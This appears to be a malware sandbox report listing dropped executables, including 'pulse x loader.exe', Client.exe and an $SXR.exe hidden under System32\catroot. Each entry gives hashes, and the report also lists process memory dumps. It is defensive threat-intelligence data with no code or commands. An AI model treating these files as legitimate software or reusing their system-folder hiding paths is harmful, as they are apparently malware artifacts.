6f3453119aeb21343e83d0ef3fc3b4b70a9ab5e8387df41c88b30910171d31593f029dad0371e4aa763a0117ab7647db0d66d2974be21dcc0d9f36f638a7adda

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
1.3MB

MD5
946ba3f539703ec6a973e9b5f7f6c447

SHA1
cdd60eaa0591453fad414f304e0ba1affb1350c4

SHA256
5a0e889aa04c890faeac643f98ee9b7d2ab46ec13adb594147ec088960b6c36d

SHA512
00deb839f70d4a9842754ee2207ac1dc83888f017932545b0dad5c0bacfb1a0cd790e4e5ffb737ecbbf59234c7982ddab82d46ec01fbf803de79b3632e68c1f2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC21939969A3334B0EBD83DEA3FE3917B8.TMP

Filesize
1KB

MD5
810535a8ae563d6aa53635a1bb1206ff

SHA1
f5ba39f1a455eb61efe5022b524892249ee75dce

SHA256
7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f

SHA512
5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fkmzrhs3\fkmzrhs3.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fkmzrhs3\fkmzrhs3.cmdline

Filesize
447B

MD5
59a2301e7c3e2183b484c7c285bf7c3f

SHA1
0b746ba249b7b8d03709b818aec996aa88c4d745

SHA256
7bd755a985eebf10a617802817c5bd6f5c84af2b1db25630cb328033538745ed

SHA512
6f688af258e3af376e47fa99682ba87078bf6dddaf72d8d2ed765cf2b70749af9031210adf410397eba84f5415ddf48a63b4c86f45ad24e70bb63e3ea0741ae6

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
3.6MB

MD5
32383cdbef6c4872f7090d99898da11d

SHA1
4d49cd961024d6a11a906a8133d20ce56a8969ff

SHA256
096c4473b024504a82ad05dbdd9991707e00ab346edac3e9f8082e98638dec7f

SHA512
97055a545cce9d9df0333748021f9c13657c3965fed0c9db582e5c8489b4f204e4be82a3481558e300880efcf52d491c37232c1aaa65115ab969cb54e4d21888

Download Submit
\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.9MB

MD5
08fc88f76cfc0c696710703e99181efd

SHA1
8672bdaddacf6d1cb571080d3730f9de30a9c69e

SHA256
23ee105659e0f0eb244e9ac131c16e41d348e09eaf1a5763c9e8175e0d90e9bb

SHA512
3b8972f4b4de5fcfaa2e250d040c7f2260f1be1ed3e7d26f0fc02c78d73cab8f1b94a854641b980c7743de75c29c7e5bcb2057e0282f897ecc43cdddc59b92a8

Download Submit
\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
2.5MB

MD5
763da8a5d8dcc7bc162c1d5c326d4e14

SHA1
8606a68dc1406ec014a3dd60973a3a7ab07a9911

SHA256
c5618ea14dc6db5a8167e75c6cd1d459be18e5d1b4cdb6c73744618ef78e5430

SHA512
9317784d9c3c323f2a82ce9829985589e0933092e1842b29ff36cfda8b423e7aa8ecd456c332c02ae9ae1afd146df9d1f7320448c7738d1474feffa682afa637

Download Submit
\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
261KB

MD5
7fb91818e5191358f4b7966a2f7fa7fa

SHA1
d70fc10c4fbb4c1251ca7268f202e2b65683c5e2

SHA256
7e88cd4cd271be9bcb5a99f1df4818ec3dddb9bbb84ae8241956a8447f2a8dcb

SHA512
bd7740e6adad6c3e72988e6c0e7d98631d3ea32c0660f078f0c5eea0b8a7baf337ba5964ebe5d71bc114e3d41c7a642fbdf0c13850f256a1cc5e7e9e90e21183

Download Submit
memory/852-72-0x000000006E490000-0x000000006EA3B000-memory.dmp

Filesize
5.7MB

Download
memory/852-85-0x000000006E490000-0x000000006EA3B000-memory.dmp

Filesize
5.7MB

Download
memory/852-75-0x000000006E490000-0x000000006EA3B000-memory.dmp

Filesize
5.7MB

Download
memory/852-73-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/852-77-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/852-78-0x0000000002250000-0x0000000002290000-memory.dmp

Filesize
256KB

Download
memory/892-124-0x000007FEF4A30000-0x000007FEF541C000-memory.dmp

Filesize
9.9MB

Download
memory/892-68-0x000007FEF4A30000-0x000007FEF541C000-memory.dmp

Filesize
9.9MB

Download
memory/892-125-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/892-82-0x000000001AD00000-0x000000001AD80000-memory.dmp

Filesize
512KB

Download
memory/892-60-0x0000000001170000-0x0000000001178000-memory.dmp

Filesize
32KB

Download
memory/1572-95-0x0000000004060000-0x0000000004061000-memory.dmp

Filesize
4KB

Download
memory/1572-126-0x0000000004060000-0x0000000004061000-memory.dmp

Filesize
4KB

Download
memory/1572-170-0x0000000002720000-0x0000000002730000-memory.dmp

Filesize
64KB

Download
memory/2112-69-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2112-26-0x0000000001370000-0x00000000013F2000-memory.dmp

Filesize
520KB

Download
memory/2112-31-0x00000000012B0000-0x00000000012F0000-memory.dmp

Filesize
256KB

Download
memory/2112-30-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2256-101-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2256-133-0x0000000000B00000-0x0000000000B0E000-memory.dmp

Filesize
56KB

Download
memory/2256-128-0x0000000004A00000-0x0000000004A40000-memory.dmp

Filesize
256KB

Download
memory/2256-168-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2256-127-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2256-103-0x0000000004A00000-0x0000000004A40000-memory.dmp

Filesize
256KB

Download
memory/2256-102-0x0000000000130000-0x0000000000770000-memory.dmp

Filesize
6.2MB

Download
memory/2528-70-0x000000006E490000-0x000000006EA3B000-memory.dmp

Filesize
5.7MB

Download
memory/2528-84-0x000000006E490000-0x000000006EA3B000-memory.dmp

Filesize
5.7MB

Download
memory/2528-76-0x000000006E490000-0x000000006EA3B000-memory.dmp

Filesize
5.7MB

Download
memory/2528-74-0x00000000027C0000-0x0000000002800000-memory.dmp

Filesize
256KB

Download
memory/2644-45-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2644-49-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2644-46-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2644-54-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2644-51-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2644-122-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2644-123-0x0000000004B70000-0x0000000004BB0000-memory.dmp

Filesize
256KB

Download
memory/2644-53-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2644-48-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2644-44-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2644-59-0x0000000004B70000-0x0000000004BB0000-memory.dmp

Filesize
256KB

Download
memory/2644-47-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2704-71-0x000000013FDA0000-0x00000001401DC000-memory.dmp

Filesize
4.2MB

Download
memory/2704-29-0x000000013FDA0000-0x00000001401DC000-memory.dmp

Filesize
4.2MB

Download
memory/2964-79-0x00000000051F0000-0x0000000005230000-memory.dmp

Filesize
256KB

Download
memory/2964-24-0x0000000000920000-0x0000000000F60000-memory.dmp

Filesize
6.2MB

Download
memory/2964-28-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download
memory/2964-97-0x0000000073B30000-0x000000007421E000-memory.dmp

Filesize
6.9MB

Download